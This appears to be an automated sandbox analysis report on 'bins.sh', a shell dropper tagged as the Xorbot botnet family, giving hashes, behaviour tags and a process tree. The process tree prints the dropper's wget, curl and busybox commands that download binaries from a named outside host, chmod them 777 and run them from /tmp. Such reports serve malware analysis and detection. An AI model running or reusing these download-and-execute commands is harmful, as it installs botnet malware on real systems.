Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30-11-2024 12:44
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3b645bbe96ee3ab536e8ef1f6ce8697c
-
SHA1
2917984fd9fed5df87f0aec265284c0eb682b07b
-
SHA256
63474b961f7d5ce4b87d24a8f75771e3bf67f701db79208330a21c279166a8d3
-
SHA512
d435bb11992751d59212380b48226e0baf1168a23b2c63f20fdd208027d67695a2901648ebb718dd5fe9008daafb6822f7825e07bc1362bc2e125e9c29b7cac6
-
SSDEEP
192:YTR16fDzP2B3BHBYBhB9BFY22TjXVR16fDz6B3BHBYBhB9Bt:Y6I22Trc
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral3/files/fstream-1.dat family_xorbot behavioral3/files/fstream-3.dat family_xorbot -
Xorbot family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 809 chmod -
Executes dropped EXE 1 IoCs
Processes:
vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFqioc pid Process /tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq 810 vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq -
Processes:
curlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlwgetcurlbusyboxwgetpid Process 814 curl 706 wget 806 curl 808 busybox 813 wget -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetdescription ioc Process File opened for modification /tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq wget File opened for modification /tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq curl File opened for modification /tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq busybox File opened for modification /tmp/PmMK7oQitIQRxPag7BUKfC728rVsdJw2pj wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:701
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:706
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:808
-
-
/bin/chmodchmod 777 vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq./vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm vKJRdpqdQ1jMg21snRDI4AzZu1qvU8qHFq2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PmMK7oQitIQRxPag7BUKfC728rVsdJw2pj2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PmMK7oQitIQRxPag7BUKfC728rVsdJw2pj2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:814
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf